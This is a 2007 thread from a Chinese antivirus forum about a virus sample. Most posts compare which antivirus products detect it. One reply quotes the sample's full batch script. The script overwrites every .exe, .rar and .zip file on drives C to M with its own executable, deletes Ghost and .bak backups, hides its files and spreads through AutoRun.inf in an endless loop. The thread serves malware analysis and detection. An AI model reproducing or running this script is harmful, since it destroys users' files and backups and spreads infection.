楼主: bluenice
收起左侧

[病毒样本] 一个很厉害的毒!微点、卡巴都搞不定。

[复制链接]
yzt1004
发表于 2007-4-30 20:27:35 | 显示全部楼层
瑞星启发

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
solid_van
发表于 2007-4-30 20:52:55 | 显示全部楼层
nod32在解压后扫描飘过,红伞也是

[ 本帖最后由 solid_van 于 2007-4-30 20:55 编辑 ]
promised
发表于 2007-4-30 20:58:47 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
jlennon
头像被屏蔽
发表于 2007-4-30 21:02:09 | 显示全部楼层

回复 #13 promised 的帖子

这个用起来感觉并不好,你还继续用
jlennon
头像被屏蔽
发表于 2007-4-30 21:05:17 | 显示全部楼层






本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
promised
发表于 2007-4-30 21:07:17 | 显示全部楼层
原帖由 jlennon 于 2007-4-30 21:02 发表
这个用起来感觉并不好,你还继续用

这个东西BUG很严重,存在严重漏扫问题
扫描时内存占用飙至180MB,CPU100%
多引擎配合一点都不好
最近比较无聊而已

[ 本帖最后由 promised 于 2007-4-30 21:09 编辑 ]
KJLCN
发表于 2007-4-30 21:11:18 | 显示全部楼层
CA挂了,Dr.Web也挂了……
moonsilver
发表于 2007-4-30 22:08:59 | 显示全部楼层
汗,瑞星能杀
pc9x
头像被屏蔽
发表于 2007-4-30 22:11:18 | 显示全部楼层
这个病毒的目的是什么呢??我运行了.没发现它有什么目的呀
Nblock
发表于 2007-4-30 22:20:38 | 显示全部楼层

fatterlove.inf

微点拦截到恶毒批处理 你选阻止即ok
如果选放行 那当然是pass啦

FOR %%b in ( d: e: f: h: g: i: j: k: l: m: ) do dir /s/b %%b\*.exe>>%windir%\fatter.inf
FOR %%z in ( c: d: e: f: h: g: i: j: k: l: m: ) do dir /s/b %%z\*.rar>>%windir%\fatter.inf
FOR %%z in ( c: d: e: f: h: g: i: j: k: l: m: ) do dir /s/b %%z\*.zip>>%windir%\fatter.inf
cd C:\Program Files
dir *.exe /s /b >>%windir%\fatterlove.inf 兔子翻版么
FOR /f "delims=" %%x in (%windir%\fatter.inf) do copy /y %windir%\fatter.exe "%%x"
FOR /f "delims=" %%x in (%windir%\fatterlove.inf) do copy /y %windir%\fatter.exe "%%x"
FOR %%z in ( c: d: e: f: h: g: i: j: k: l: m: ) do del /f /s /q %%z\*.gho
FOR %%z in ( c: d: e: f: h: g: i: j: k: l: m: ) do del /f /s /q %%z\*.bak
FOR %%z in ( c: d: e: f: h: g: i: j: k: l: m: ) do MD "%%z\Fatter..\"
attrib +s +h %windir%\fat.exe
attrib +s +h %windir%\game.exe
attrib +s +h %windir%\kill.vbs
attrib +s +h %windir%\qq.exe
attrib +s +h %windir%\fatter.exe
attrib +s +h %windir%\ie.vbs
attrib +s +h %windir%\regedit.vbs
attrib +s +h %windir%\system.vbs
attrib +s +h %windir%\taskmgr.vbs
attrib +s +h %windir%\regedit.com
attrib +s +h %windir%\explorer.com
attrib +s +h %windir%\system32\regedit.com
attrib +s +h %windir%\PCHEALTH\HELPCTR\Binaries\msconfig.com
attrib +s +h d:\fatter.exe
attrib +s +h e:\fatter.exe
attrib +s +h c:\fatter.exe
attrib +s +h f:\fatter.exe
attrib +s +h g:\fatter.exe
attrib +s +h h:\fatter.exe
attrib +s +h i:\fatter.exe
attrib +s +h j:\fatter.exe
attrib +s +h k:\fatter.exe
attrib +s +h l:\fatter.exe
attrib +s +h m:\fatter.exe
attrib +s +h e:\AutoRun.inf
attrib +s +h f:\AutoRun.inf
attrib +s +h c:\AutoRun.inf
attrib +s +h d:\AutoRun.inf
attrib +s +h h:\AutoRun.inf
attrib +s +h g:\AutoRun.inf
attrib +s +h i:\AutoRun.inf
attrib +s +h j:\AutoRun.inf
attrib +s +h k:\AutoRun.inf
attrib +s +h l:\AutoRun.inf
attrib +s +h m:\AutoRun.inf
:Fatter
echo[:27:]  I'm Fatter!  I need job! I love this game! I think you love this game,too! Good Luck!But I think you are not very lucky,Because I kissed you!>>Fatter.txt
FOR %%z in ( c: d: e: f: h: g: i: j: k: l: m: ) do copy /y fatter.txt "%%z\Fatter..\"
FOR %%z in ( c: d: e: f: h: g: i: j: k: l: m: ) do copy /y %windir%\fatter.exe "%%z\Fatter..\"
FOR %%z in ( c: d: e: f: h: g: i: j: k: l: m: ) do copy /y %%z\Fatter..\fatter.exe "%%z\"
FOR %%z in ( c: d: e: f: h: g: i: j: k: l: m: ) do copy /y Autorun.inf "%%z\"
FOR %%z in ( c: d: e: f: h: g: i: j: k: l: m: ) do copy /y fatter.exe "%%z\"
goto fatter

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-20 12:55 , Processed in 0.101860 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表